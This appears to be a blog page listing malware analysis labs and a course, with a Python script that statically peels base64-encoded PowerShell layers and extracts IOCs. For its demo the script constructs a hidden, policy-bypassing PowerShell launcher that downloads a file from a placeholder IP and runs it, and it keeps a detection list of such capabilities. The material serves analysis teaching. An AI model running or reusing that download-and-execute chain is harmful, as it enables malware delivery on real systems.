Malware Analysis Exercise – Living Off the Land with Powershell

It is common for threat actors to rely on living off the land (LOTL) techniques, such as launching PowerShell, to pivot from the initial macro code to the next stage of an attack. This lab is intended to show how you can often perform quick analysis to extract important IOCs. While there may be several ways to answer these questions, the focus of this exercise is on static techniques for analysis. You can find the exercise, artifacts and full walk-through on my Github at https://github.com/jstrosch/malware-samples/tree/master/malware_analysis_exercises/2020/December. Looking for more of a challenge? Try this on CyberDefenders as part of their CTF! https://cyberdefenders.org/labs/51
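As an added, self-contained illustration of the kind of static triage the lab is after (this is not code from the exercise or from its walk-through), the Python below peels the layers of a PowerShell launcher without executing anything: it decodes the UTF-16LE base64 behind `-EncodedCommand`, then any inline `FromBase64String()` stage it finds, and regex-extracts the network and host IOCs from every layer. The command line, the URL, the IP address and the drop path are all constructed for the example; the exercise's own artifacts are in the linked repository.

```python
"""Static triage of a PowerShell living-off-the-land launcher.

Peels -EncodedCommand (UTF-16LE base64) and inline FromBase64String() layers
without running PowerShell, then regex-extracts IOCs from every layer.
"""
import base64
import re
from typing import Dict, List, Optional

# --- constructed sample; not an artifact from the exercise --------------------
STAGE2 = ("$u='http://203.0.113.7/update.dat';"
          "$p=\"$env:TEMP\\svc.exe\";"
          "(New-Object Net.WebClient).DownloadFile($u,$p);"
          "Start-Process $p")
# Stage 1 hides stage 2 behind an inline base64 string, a very common second layer.
STAGE1 = ("IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + base64.b64encode(STAGE2.encode()).decode() + "')))")
# The launcher a macro would spawn: -EncodedCommand takes UTF-16LE base64.
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -ep bypass -enc "
                  + base64.b64encode(STAGE1.encode("utf-16-le")).decode())

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+[\"']?([A-Za-z0-9+/=]{8,})")
INLINE_B64 = re.compile(r"FromBase64String\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")

IOC_PATTERNS = {
    "urls": re.compile(r"https?://[^\s'\"()<>]+"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "paths": re.compile(r"(?:[A-Za-z]:|\$env:[A-Za-z]+)\\[^\s'\"();]+"),
}
# Capabilities worth calling out in a report; matched case-insensitively.
CAPABILITIES = ["Net.WebClient", "DownloadFile", "DownloadString",
                "Invoke-WebRequest", "IEX", "Invoke-Expression", "Start-Process",
                "FromBase64String", "-w hidden", "-nop", "-ep bypass"]


def decode_b64_text(b64: str) -> Optional[str]:
    """Decode a base64 token to text, or None if it is not text we can read."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    # -EncodedCommand payloads are UTF-16LE, so an ASCII script shows a NUL in
    # every odd byte; FromBase64String() payloads are usually plain UTF-8.
    if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) >= len(raw) // 4:
        enc = "utf-16-le"
    else:
        enc = "utf-8"
    try:
        text = raw.decode(enc)
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def peel_layers(cmdline: str, max_depth: int = 5) -> List[str]:
    """Return the launcher plus every decoded layer, outermost first."""
    layers = [cmdline]
    current = cmdline
    for _ in range(max_depth):
        match = ENC_FLAG.search(current) or INLINE_B64.search(current)
        if match is None:
            break
        decoded = decode_b64_text(match.group(1))
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers


def extract_iocs(layers: List[str]) -> Dict[str, List[str]]:
    """Collect URLs, IPs, paths and notable capabilities across all layers."""
    text = "\n".join(layers)
    iocs = {name: sorted(set(pat.findall(text))) for name, pat in IOC_PATTERNS.items()}
    iocs["capabilities"] = [
        cap for cap in CAPABILITIES
        if re.search(r"(?<![\w-])" + re.escape(cap) + r"(?![\w-])", text, re.I)
    ]
    return iocs


if __name__ == "__main__":
    found = peel_layers(SAMPLE_CMDLINE)
    for depth, layer in enumerate(found):
        print(f"--- layer {depth} ---\n{layer[:120]}")
    for kind, values in extract_iocs(found).items():
        print(f"{kind}: {values}")
```

The decoder is deliberately conservative: it only follows a base64 token that decodes to printable text, so a binary blob or a corrupted string stops the peeling instead of producing garbage IOCs, and it never evaluates any of the recovered script.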

Malware Analysis Exercise – Getting Started with Excel 4 Macros

Recently, we have seen a resurgence of malicious Excel documents. However, instead of using VBA macros, they use the older-style Excel 4.0 (XLM) macros. This changes our approach to analyzing these documents and requires a slightly different set of tools. In this challenge, you'll get hands-on with two documents that use Excel 4.0 macros to perform anti-analysis and download the next stage of the attack. You can find the exercise, artifacts and full walk-through on my Github at https://github.com/jstrosch/malware-samples/tree/master/malware_analysis_exercises/2021/February. Looking for more of a challenge? Try this on CyberDefenders as part of their CTF! https://cyberdefenders.org/labs/55

First Pluralsight course now live!

I'm excited to announce that my first Pluralsight course, Analyzing Malware for .NET and Java Binaries, is now live! You can find the course at the following URL: http://www.pluralsight.com/courses/dotnet-java-binaries-analyzing-malware. The ability to quickly analyze software is a critical skill for anyone handling malware. This course will teach you techniques for reverse engineering Java and .NET binaries and for generating indicators of compromise, and will get you hands-on with malware.
